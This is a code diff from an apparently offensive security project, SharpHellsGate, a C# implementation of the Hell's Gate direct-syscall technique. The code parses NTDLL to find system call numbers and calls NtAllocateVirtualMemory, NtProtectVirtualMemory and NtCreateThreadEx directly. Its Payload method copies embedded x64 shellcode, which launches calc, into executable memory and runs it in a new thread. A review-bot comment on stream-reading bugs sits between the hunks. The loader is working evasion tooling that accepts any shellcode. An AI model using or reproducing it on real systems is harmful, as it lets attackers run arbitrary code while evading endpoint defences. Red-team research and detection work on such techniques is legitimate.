||||||
|
/// Managed wrapper around the NtCreateThreadEx native Windows function.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="hThread">Caller supplied storage for the resulting handle.</param>
|
||||||
|
/// <param name="DesiredAccess">Specifies the allowed or desired access to the thread.</param>
|
||||||
|
/// <param name="ObjectAttributes">Initialized attributes for the object.</param>
|
||||||
|
/// <param name="ProcessHandle">Handle to the threads parent process.</param>
|
||||||
|
/// <param name="lpStartAddress">Address of the function to execute.</param>
|
||||||
|
/// <param name="lpParameter">Parameters to pass to the function.</param>
|
||||||
|
/// <param name="CreateSuspended">Whether the thread will be in suspended mode and has to be resumed later.</param>
|
||||||
|
/// <param name="StackZeroBits"></param>
|
||||||
|
/// <param name="SizeOfStackCommit">Initial stack memory to commit.</param>
|
||||||
|
/// <param name="SizeOfStackReserve">Initial stack memory to reserve.</param>
|
||||||
|
/// <param name="lpBytesBuffer"></param>
|
||||||
|
/// <returns>NtCreateThreadEx returns either STATUS_SUCCESS or an error status code.</returns>
|
||||||
|
private UInt32 NtCreateThreadEx(ref IntPtr hThread, uint DesiredAccess, IntPtr ObjectAttributes, IntPtr ProcessHandle, IntPtr lpStartAddress, IntPtr lpParameter, bool CreateSuspended, uint StackZeroBits, uint SizeOfStackCommit, uint SizeOfStackReserve, IntPtr lpBytesBuffer) {
|
||||||
|
lock (this.Mutant) {
|
||||||
|
Int16 syscall = this.APITable[Util.NtCreateThreadExHash].Syscall;
|
||||||
|
if (syscall == 0x0000)
|
||||||
|
return Macros.STATUS_UNSUCCESSFUL;
|
||||||
|
|
||||||
|
DFunctions.NtCreateThreadEx Func = NtInvocation<DFunctions.NtCreateThreadEx>(syscall);
|
||||||
|
return Func(ref hThread, DesiredAccess, ObjectAttributes, ProcessHandle, lpStartAddress, lpParameter, CreateSuspended, StackZeroBits, SizeOfStackCommit, SizeOfStackReserve, lpBytesBuffer);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Managed wrapper around the NtWaitForSingleObject native Windows function.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ObjectHandle">Open handle to a alertable executive object.</param>
|
||||||
|
/// <param name="Alertable">If set, calling thread is signaled, so all queued APC routines are executed.</param>
|
||||||
|
/// <param name="TimeOuts">Time-out interval, in microseconds. NULL means infinite.</param>
|
||||||
|
/// <returns>NtWaitForSingleObject returns either STATUS_SUCCESS or an error status code.</returns>
|
||||||
|
private UInt32 NtWaitForSingleObject(IntPtr ObjectHandle, bool Alertable, ref Structures.LARGE_INTEGER TimeOuts) {
|
||||||
|
lock (this.Mutant) {
|
||||||
|
Int16 syscall = this.APITable[Util.NtWaitForSingleObjectHash].Syscall;
|
||||||
|
if (syscall == 0x0000)
|
||||||
|
return Macros.STATUS_UNSUCCESSFUL;
|
||||||
|
|
||||||
|
DFunctions.NtWaitForSingleObject Func = NtInvocation<DFunctions.NtWaitForSingleObject>(syscall);
|
||||||
|
return Func(ObjectHandle, Alertable, ref TimeOuts);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// .ctor
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="Table">The API table that will be used by the multiple function wrapers.</param>
|
||||||
|
public HellsGate(Dictionary<UInt64, Util.APITableEntry> Table) {
|
||||||
|
this.APITable = Table;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// JIT a static method to generate RWX memory segment.
|
||||||
|
/// </summary>
|
||||||
|
/// <returns>Whether the memory segment was successfully generated.</returns>
|
||||||
|
public bool GenerateRWXMemorySegment() {
|
||||||
|
// Find and JIT the method
|
||||||
|
MethodInfo method = typeof(HellsGate).GetMethod(nameof(Gate), BindingFlags.Static | BindingFlags.NonPublic);
|
||||||
|
if (method == null) {
|
||||||
|
Util.LogError("Unable to find the method");
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
RuntimeHelpers.PrepareMethod(method.MethodHandle);
|
||||||
|
|
||||||
|
// Get the address of the function and check if first opcode == JMP
|
||||||
|
IntPtr pMethod = method.MethodHandle.GetFunctionPointer();
|
||||||
|
if (Marshal.ReadByte(pMethod) != 0xe9) {
|
||||||
|
Util.LogError("Method was not JIT'ed or invalid stub");
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
Util.LogInfo($"Managed method address: 0x{pMethod:x16}");
|
||||||
|
|
||||||
|
// Get address of jited method and stack alignment
|
||||||
|
Int32 offset = Marshal.ReadInt32(pMethod, 1);
|
||||||
|
UInt64 addr = (UInt64)pMethod + (UInt64)offset;
|
||||||
|
while (addr % 16 != 0)
|
||||||
|
addr++;
|
||||||
|
Util.LogInfo($"Unmanaged method address: 0x{addr:x16}\n");
|
||||||
|
|
||||||
|
this.MangedMethodAddress = method.MethodHandle.GetFunctionPointer();
|
||||||
|
this.UnmanagedMethodAddress = (IntPtr)addr;
|
||||||
|
this.IsGateReady = true;
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Payload example. In this case this is a basic shellcode self-injection.
|
||||||
|
/// </summary>
|
||||||
|
public void Payload() {
|
||||||
|
if (!this.IsGateReady) {
|
||||||
|
if (!this.GenerateRWXMemorySegment()) {
|
||||||
|
Util.LogError("Unable to generate RX memory segment");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
byte[] shellcode = new byte[273] {
|
||||||
|
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
|
||||||
|
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
|
||||||
|
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
|
||||||
|
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
|
||||||
|
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
|
||||||
|
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
|
||||||
|
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
|
||||||
|
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
|
||||||
|
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
|
||||||
|
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
|
||||||
|
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
|
||||||
|
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
|
||||||
|
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
|
||||||
|
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
|
||||||
|
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
|
||||||
|
0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
|
||||||
|
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
|
||||||
|
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
|
||||||
|
0x63,0x00,0xc3
|
||||||
|
};
|
||||||
|
Util.LogInfo($"Shellcode size: {shellcode.Length} bytes");
|
||||||
|
|
||||||
|
// Allocate Memory
|
||||||
|
IntPtr pBaseAddres = IntPtr.Zero;
|
||||||
|
IntPtr Region = (IntPtr)shellcode.Length;
|
||||||
|
UInt32 ntstatus = NtAllocateVirtualMemory(Macros.GetCurrentProcess(), ref pBaseAddres, IntPtr.Zero, ref Region, Macros.MEM_COMMIT | Macros.MEM_RESERVE, Macros.PAGE_READWRITE);
|
||||||
|
if (!Macros.NT_SUCCESS(ntstatus)) {
|
||||||
|
Util.LogError($"Error ntdll!NtAllocateVirtualMemory (0x{ntstatus:0x8})");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
Util.LogInfo($"Page address: 0x{pBaseAddres:x16}");
|
||||||
|
|
||||||
|
// Copy Memory
|
||||||
|
Marshal.Copy(shellcode, 0, pBaseAddres, shellcode.Length);
|
||||||
|
Array.Clear(shellcode, 0, shellcode.Length);
|
||||||
|
|
||||||
|
// Change memory protection
|
||||||
|
UInt32 OldAccessProtection = 0;
|
||||||
|
ntstatus = NtProtectVirtualMemory(Macros.GetCurrentProcess(), ref pBaseAddres, ref Region, Macros.PAGE_EXECUTE_READ, ref OldAccessProtection);
|
||||||
|
if (!Macros.NT_SUCCESS(ntstatus) || OldAccessProtection != 0x0004) {
|
||||||
|
Util.LogError($"Error ntdll!NtProtectVirtualMemory (0x{ntstatus:0x8})");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
IntPtr hThread = IntPtr.Zero;
|
||||||
|
ntstatus = NtCreateThreadEx(ref hThread, 0x1FFFFF, IntPtr.Zero, Macros.GetCurrentProcess(), pBaseAddres, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);
|
||||||
|
if (!Macros.NT_SUCCESS(ntstatus) || hThread == IntPtr.Zero) {
|
||||||
|
Util.LogError($"Error ntdll!NtCreateThreadEx (0x{ntstatus:0x8})");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
Util.LogInfo($"Thread handle: 0x{hThread:x16}\n");
|
||||||
|
|
||||||
|
// Wait for one second
|
||||||
|
Structures.LARGE_INTEGER TimeOut = new Structures.LARGE_INTEGER();
|
||||||
|
TimeOut.QuadPart = -10000000;
|
||||||
|
ntstatus = NtWaitForSingleObject(hThread, false, ref TimeOut);
|
||||||
|
if (ntstatus != 0x00) {
|
||||||
|
Util.LogError($"Error ntdll!NtWaitForSingleObject (0x{ntstatus:0x8})");
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
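--- a/Hells Gate/C# Implementation/SharpHellsGate/Module/MemoryUtil.cs
+++ b/Hells Gate/C# Implementation/SharpHellsGate/Module/MemoryUtil.cs
@@ -0,0 +1,142 @@
+using System;
+using System.IO;
+using System.Runtime.InteropServices;
+using System.Text;
+
+namespace SharpHellsGate.Module {
+/// <summary>
+/// Used to manipulate and extract information from a memory stream.
+/// In this case the memory stream is the NTDLL module.
+/// </summary>
+public class MemoryUtil : IDisposable {
+
+/// <summary>
+/// The memory stream representation of the NTDLL module.
+/// </summary>
+protected Stream ModuleStream { get; set; }
+
+/// <summary>
+/// Dispose the memory stream when no longer needed.
+/// </summary>
+~MemoryUtil() => Dispose();
+
+/// <summary>
+/// Dispose the memory stream when no longer needed.
+/// </summary>
+public void Dispose() {
+this.ModuleStream.Dispose();
+this.ModuleStream.Close();
+GC.SuppressFinalize(this);
+}
+
+/// <summary>
+/// Extract a structure from the memory stream.
+/// </summary>
+/// <typeparam name="T">The Type of the structure to extract.</typeparam>
+/// <param name="offset">The offset in the memory stream where the structure is located.</param>
+/// <returns>The structure populated or the default structure.</returns>
+protected T GetStructureFromBlob<T>(Int64 offset) where T : struct {
+Span<byte> bytes = this.GetStructureBytesFromOffset<T>(offset);
+if (Marshal.SizeOf<T>() != bytes.Length)
+return default;
+
+IntPtr ptr = Marshal.AllocHGlobal(Marshal.SizeOf<T>());
+Marshal.Copy(bytes.ToArray(), 0, ptr, bytes.Length);
+T s = Marshal.PtrToStructure<T>(ptr);
+
+Marshal.FreeHGlobal(ptr);
+return s;
+}
+
+/// <summary>
+/// Extract the code from a native Windows function.
+/// </summary>
+/// <param name="offset">The location of the function in the memory stream.</param>
+/// <returns>The 24 bytes representing the code of the function.</returns>
+protected Span<byte> GetFunctionOpCode(Int64 offset) {
+Span<byte> s = stackalloc byte[24];
+this.ModuleStream.Seek(offset, SeekOrigin.Begin);
+this.ModuleStream.Read(s);
+return s.ToArray();
+}
+
+/// <summary>
+/// Extract a DWORD value from the memory stream.
+/// </summary>
+/// <param name="offset">The location of the DWORD in the memory stream.</param>
+/// <returns>The value of the DWORD.</returns>
+protected UInt32 ReadPtr32(Int64 offset) {
+Span<byte> s = stackalloc byte[4];
+this.ModuleStream.Seek(offset, SeekOrigin.Begin);
+this.ModuleStream.Read(s);
+return BitConverter.ToUInt32(s);
+}
+
+/// <summary>
+/// Extract a QWORD value from the memory stream.
+/// </summary>
+/// <param name="offset">The location of the QWORD in the memory stream.</param>
+/// <returns>The value of the QWORD.</returns>
+protected UInt64 ReadPtr64(Int64 offset) {
+Span<byte> s = stackalloc byte[8];
+this.ModuleStream.Seek(offset, SeekOrigin.Begin);
+this.ModuleStream.Read(s);
+return BitConverter.ToUInt64(s);
+}
+
+/// <summary>
+/// Extract a WORD value from the memory stream.
+/// </summary>
+/// <param name="offset">The location of the WORD in the memory stream.</param>
+/// <returns>The value of the WORD.</returns>
+protected UInt16 ReadUShort(Int64 offset) {
+Span<byte> s = stackalloc byte[2];
+this.ModuleStream.Seek(offset, SeekOrigin.Begin);
+this.ModuleStream.Read(s);
+return BitConverter.ToUInt16(s);
+}
+
+/// <summary>
+/// Extract an ASCII string from the memory stream.
+/// </summary>
+/// <param name="offset">The location of the ASCII string in the memory stream.</param>
+/// <returns>The ASCII string.</returns>
+protected string ReadAscii(Int64 offset) {
+int length = 0;
+this.ModuleStream.Seek(offset, SeekOrigin.Begin);
+while (this.ModuleStream.ReadByte() != 0x00)
+length++;
+
+Span<byte> s = length <= 1024 ? stackalloc byte[length] : new byte[length];
+this.ModuleStream.Seek(offset, SeekOrigin.Begin);
+this.ModuleStream.Read(s);
+return Encoding.ASCII.GetString(s);
+}
+
+/// <summary>
+/// Extract the byte representation of a structure from the memory stream.
+/// </summary>
+/// <typeparam name="T">The Type of the structure to extract from the memory stream.</typeparam>
+/// <param name="offset">The location of the structure in the memory stream.</param>
+/// <returns>The structure as byte span.</returns>
+protected Span<byte> GetStructureBytesFromOffset<T>(Int64 offset) where T : struct {
+Span<byte> s = stackalloc byte[Marshal.SizeOf<T>()];
+this.ModuleStream.Seek(offset, SeekOrigin.Begin);
+this.ModuleStream.Read(s);
+return s.ToArray();
+}
+
+/// <summary>
+/// Get a specific amount of bytes at a specific location in the memory stream.
+/// </summary>
+/// <param name="offset">The location of the bytes to extract from the memory stream.</param>
+/// <param name="size">The number of bytes to extract from the memory stream at a give location.</param>
+/// <returns>The desired bytes as a byte span.</returns>
+protected Span<byte> GetBytesFromOffset(Int64 offset, int size) {
+Span<byte> s = size >= 1024 ? new byte[size] : stackalloc byte[size];
+this.ModuleStream.Seek(offset, SeekOrigin.Begin);
+this.ModuleStream.Read(s);
+return s.ToArray();
+}
+}
+}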
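Review bot: `ReadAscii` scans with `while (this.ModuleStream.ReadByte() != 0x00)`, and `Stream.ReadByte` returns -1 at end of stream, so a string that is not NUL-terminated before the end of the blob never leaves the loop; stop on end of stream as well, e.g. `int b; while ((b = this.ModuleStream.ReadByte()) > 0) length++;` followed by `if (b < 0) return string.Empty;`. Every `this.ModuleStream.Read(s)` call in this file (GetFunctionOpCode, ReadPtr32, ReadPtr64, ReadUShort, ReadAscii, GetStructureBytesFromOffset, GetBytesFromOffset) ignores the number of bytes actually read, so an offset past the end of the stream silently yields zero-filled data, and the `Marshal.SizeOf<T>() != bytes.Length` check in GetStructureFromBlob cannot catch it because GetStructureBytesFromOffset always returns exactly `Marshal.SizeOf<T>()` bytes; comparing the return value of `Read` against the requested size is the check that would detect a truncated or malformed image. `Dispose()` dereferences `this.ModuleStream` unconditionally and is also invoked from the finalizer, so an instance whose stream was never assigned throws on the finalizer thread; `this.ModuleStream?.Dispose();` avoids that, and the following `Close()` is redundant once `Dispose()` has run.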
@ -0,0 +1,328 @@
|
|||||||
|
using System;
|
||||||
|
using System.IO;
|
||||||
|
using SharpHellsGate.Win32;
|
||||||
|
using System.Collections.Generic;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
using System.Linq;
|
||||||
|
|
||||||
|
namespace SharpHellsGate.Module {
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Wrapper around the NTDLL module.
|
||||||
|
/// Used to extract structures and find system calls.
|
||||||
|
/// </summary>
|
||||||
|
public class SystemModule : MemoryUtil {
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// IMAGE_DOS_HEADER structure of the NTDLL module.
|
||||||
|
/// </summary>
|
||||||
|
public Structures.IMAGE_DOS_HEADER ModuleDOSHeader { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// IMAGE_NT_HEADERS64 structure of the NTDLL module.
|
||||||
|
/// </summary>
|
||||||
|
public Structures.IMAGE_NT_HEADERS64 ModuleNTHeaders { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// IMAGE_SECTION_HEADER structure from the NTDLL module.
|
||||||
|
/// </summary>
|
||||||
|
public List<Structures.IMAGE_SECTION_HEADER> ModuleSectionHeaders { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// IMAGE_EXPORT_DIRECTORY structure from the NTDLL module.
|
||||||
|
/// </summary>
|
||||||
|
public Structures.IMAGE_EXPORT_DIRECTORY ModuleExportDirectory { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Location in the memory stream of the IMAGE_EXPORT_DIRECTORY structure.
|
||||||
|
/// </summary>
|
||||||
|
public Int64 ModuleExportDirectoryOffset { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Location in the memory stream of the exported functions' name.
|
||||||
|
/// </summary>
|
||||||
|
public Int64 ModuleExportDirectoryAddressNamesOffset { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Location in the memory stream of the exported functions' address.
|
||||||
|
/// </summary>
|
||||||
|
public Int64 ModuleExportDirectoryAddressFunctionsOffset { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Location in the memory stream of the exported functions' ordinal.
|
||||||
|
/// </summary>
|
||||||
|
public Int64 ModuleExportDirectoryAddressNameOrdinalesOffset { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Name of the module. Will be NTDLL.
|
||||||
|
/// </summary>
|
||||||
|
public string ModuleName { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Path of the module. Will be %WINDIR%\System32\ntdll.dll
|
||||||
|
/// </summary>
|
||||||
|
public string ModulePath { get; private set; }
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// .ctor
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="name">Name of the module</param>
|
||||||
|
public SystemModule(string name) : base() {
|
||||||
|
this.ModuleName = name;
|
||||||
|
this.ModulePath = $"{Environment.SystemDirectory}\\{name}";
|
||||||
|
this.ModuleSectionHeaders = new List<Structures.IMAGE_SECTION_HEADER>() { };
|
||||||
|
|
||||||
|
this.LoadModule();
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Load the module into a memory stream.
|
||||||
|
/// </summary>
|
||||||
|
/// <returns>Whether the loading process was a success.</returns>
|
||||||
|
public bool LoadModule() {
|
||||||
|
if (string.IsNullOrEmpty(this.ModuleName)) {
|
||||||
|
Util.LogError("Module name not provided");
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!File.Exists(this.ModulePath)) {
|
||||||
|
Util.LogError($"Unable to find module: {this.ModuleName}");
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
|
||||||
|
ReadOnlySpan<byte> ModuleBlob = File.ReadAllBytes(this.ModulePath);
|
||||||
|
if (ModuleBlob.Length == 0x00) {
|
||||||
|
Util.LogError($"Empty module content: {this.ModuleName}");
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
|
||||||
|
base.ModuleStream = new MemoryStream(ModuleBlob.ToArray());
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Reload all structures.
|
||||||
|
/// </summary>
|
||||||
|
/// <returns>Whether all structures were successfully reloaded.</returns>
|
||||||
|
public bool LoadAllStructures() {
|
||||||
|
if (this.GetModuleDOSHeader(true).Equals(default(Structures.IMAGE_DOS_HEADER)))
|
||||||
|
return false;
|
||||||
|
|
||||||
|
if (this.GetModuleNTHeaders(true).Equals(default(Structures.IMAGE_NT_HEADERS64)))
|
||||||
|
return false;
|
||||||
|
|
||||||
|
if (this.GetModuleSectionHeaders(true).Count != this.ModuleNTHeaders.FileHeader.NumberOfSections)
|
||||||
|
return false;
|
||||||
|
|
||||||
|
if (this.GetModuleExportDirectory(true).Equals(default(Structures.IMAGE_EXPORT_DIRECTORY)))
|
||||||
|
return false;
|
||||||
|
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Get the _IMAGE_DOS_HEADERstructure from the module.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||||
|
/// <returns>The IMAGE_NT_HEADERS64 structure of the module.</returns>
|
||||||
|
public Structures.IMAGE_DOS_HEADER GetModuleDOSHeader(bool ReloadCache = false) {
|
||||||
|
if (!this.ModuleDOSHeader.Equals(default(Structures.IMAGE_DOS_HEADER)) && !ReloadCache)
|
||||||
|
return this.ModuleDOSHeader;
|
||||||
|
|
||||||
|
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||||
|
Util.LogError("Module not loaded");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
this.ModuleDOSHeader = base.GetStructureFromBlob<Structures.IMAGE_DOS_HEADER>(0);
|
||||||
|
if (this.ModuleDOSHeader.e_magic != Macros.IMAGE_DOS_SIGNATURE) {
|
||||||
|
Util.LogError("Invalid DOS header signature");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
return this.ModuleDOSHeader;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Get the IMAGE_NT_HEADERS64 structure from the module.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||||
|
/// <returns>The IMAGE_NT_HEADERS64 structure of the module.</returns>
|
||||||
|
public Structures.IMAGE_NT_HEADERS64 GetModuleNTHeaders(bool ReloadCache = false) {
|
||||||
|
if (!this.ModuleNTHeaders.Equals(default(Structures.IMAGE_NT_HEADERS64)) && !ReloadCache)
|
||||||
|
return this.ModuleNTHeaders;
|
||||||
|
|
||||||
|
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||||
|
Util.LogError("Module not loaded");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (this.ModuleDOSHeader.Equals(default(Structures.IMAGE_DOS_HEADER)))
|
||||||
|
this.GetModuleDOSHeader();
|
||||||
|
|
||||||
|
this.ModuleNTHeaders = base.GetStructureFromBlob<Structures.IMAGE_NT_HEADERS64>(this.ModuleDOSHeader.e_lfanew);
|
||||||
|
if (this.ModuleNTHeaders.Signature != Macros.IMAGE_NT_SIGNATURE) {
|
||||||
|
Util.LogError("Invalid NT headers signature");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
return this.ModuleNTHeaders;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Get list of _IMAGE_SECTION_HEADER structures from the module.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||||
|
/// <returns>The list of _IMAGE_SECTION_HEADER structures.</returns>
|
||||||
|
public List<Structures.IMAGE_SECTION_HEADER> GetModuleSectionHeaders(bool ReloadCache = false) {
|
||||||
|
if (this.ModuleSectionHeaders.Count == this.ModuleNTHeaders.FileHeader.NumberOfSections && !ReloadCache)
|
||||||
|
return this.ModuleSectionHeaders;
|
||||||
|
|
||||||
|
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||||
|
Util.LogError("Module not loaded");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (this.ModuleNTHeaders.Equals(default(Structures.IMAGE_NT_HEADERS64)) || this.ModuleNTHeaders.FileHeader.Equals(default(Structures.IMAGE_FILE_HEADER)))
|
||||||
|
this.GetModuleNTHeaders();
|
||||||
|
|
||||||
|
for (Int16 cx = 0; cx < this.ModuleNTHeaders.FileHeader.NumberOfSections; cx++) {
|
||||||
|
Int64 iSectionOffset = this.GetModuleSectionOffset(cx);
|
||||||
|
|
||||||
|
Structures.IMAGE_SECTION_HEADER ImageSection = base.GetStructureFromBlob<Structures.IMAGE_SECTION_HEADER>(iSectionOffset);
|
||||||
|
if (!ImageSection.Equals(default(Structures.IMAGE_SECTION_HEADER)))
|
||||||
|
this.ModuleSectionHeaders.Add(ImageSection);
|
||||||
|
}
|
||||||
|
|
||||||
|
return this.ModuleSectionHeaders;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Get a _IMAGE_SECTION_HEADER structure by name.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="name">The name of the section.</param>
|
||||||
|
/// <returns>The _IMAGE_SECTION_HEADER structure if exists.</returns>
|
||||||
|
public Structures.IMAGE_SECTION_HEADER GetModuleSectionHeaderByName(string name) {
|
||||||
|
if (name.Length > 8) {
|
||||||
|
Util.LogError("Invalid section name");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||||
|
Util.LogError("Module not loaded");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (this.ModuleSectionHeaders.Count == 0x00)
|
||||||
|
this.GetModuleSectionHeaders();
|
||||||
|
|
||||||
|
return this.ModuleSectionHeaders.Where(x => x.Name.Equals(name, StringComparison.OrdinalIgnoreCase)).FirstOrDefault();
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Get the Export Address Table (aka EAT) from the module.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ReloadCache">Whether the data has to re-processed if not already cached.</param>
|
||||||
|
/// <returns>the _IMAGE_EXPORT_DIRECTORY structure</returns>
|
||||||
|
public Structures.IMAGE_EXPORT_DIRECTORY GetModuleExportDirectory(bool ReloadCache = false) {
|
||||||
|
if (!this.ModuleExportDirectory.Equals(default(Structures.IMAGE_EXPORT_DIRECTORY)) && !ReloadCache)
|
||||||
|
return this.ModuleExportDirectory;
|
||||||
|
|
||||||
|
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||||
|
Util.LogError("Module not loaded");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (this.ModuleNTHeaders.Equals(default(Structures.IMAGE_NT_HEADERS64)))
|
||||||
|
this.GetModuleNTHeaders();
|
||||||
|
|
||||||
|
if (this.ModuleSectionHeaders.Count == 0x00)
|
||||||
|
this.GetModuleSectionHeaders();
|
||||||
|
|
||||||
|
this.ModuleExportDirectoryOffset = this.ConvertRvaToOffset(this.ModuleNTHeaders.OptionalHeader.DataDirectory[0].VirtualAddress);
|
||||||
|
this.ModuleExportDirectory = base.GetStructureFromBlob<Structures.IMAGE_EXPORT_DIRECTORY>(this.ModuleExportDirectoryOffset);
|
||||||
|
if (this.ModuleExportDirectory.Equals(default(Structures.IMAGE_EXPORT_DIRECTORY))) {
|
||||||
|
Util.LogError("Invalid export address table (EAT).");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Parse all functions
|
||||||
|
this.ModuleExportDirectoryAddressNamesOffset = this.ConvertRvaToOffset(this.ModuleExportDirectory.AddressOfNames);
|
||||||
|
this.ModuleExportDirectoryAddressFunctionsOffset = this.ConvertRvaToOffset(this.ModuleExportDirectory.AddressOfFunctions);
|
||||||
|
this.ModuleExportDirectoryAddressNameOrdinalesOffset = this.ConvertRvaToOffset(this.ModuleExportDirectory.AddressOfNameOrdinals);
|
||||||
|
return this.ModuleExportDirectory;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Get the address, name, system call for a given function hash.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="FunctionHash">DJB2 function hash.</param>
|
||||||
|
/// <returns></returns>
|
||||||
|
public Util.APITableEntry GetAPITableEntry(UInt64 FunctionHash) {
|
||||||
|
if (this.ModuleExportDirectoryAddressNamesOffset == 0x00 || this.ModuleExportDirectoryAddressFunctionsOffset == 0x00|| this.ModuleExportDirectoryAddressNameOrdinalesOffset == 0x00)
|
||||||
|
this.GetModuleExportDirectory();
|
||||||
|
|
||||||
|
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||||
|
Util.LogError("Module not loaded");
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
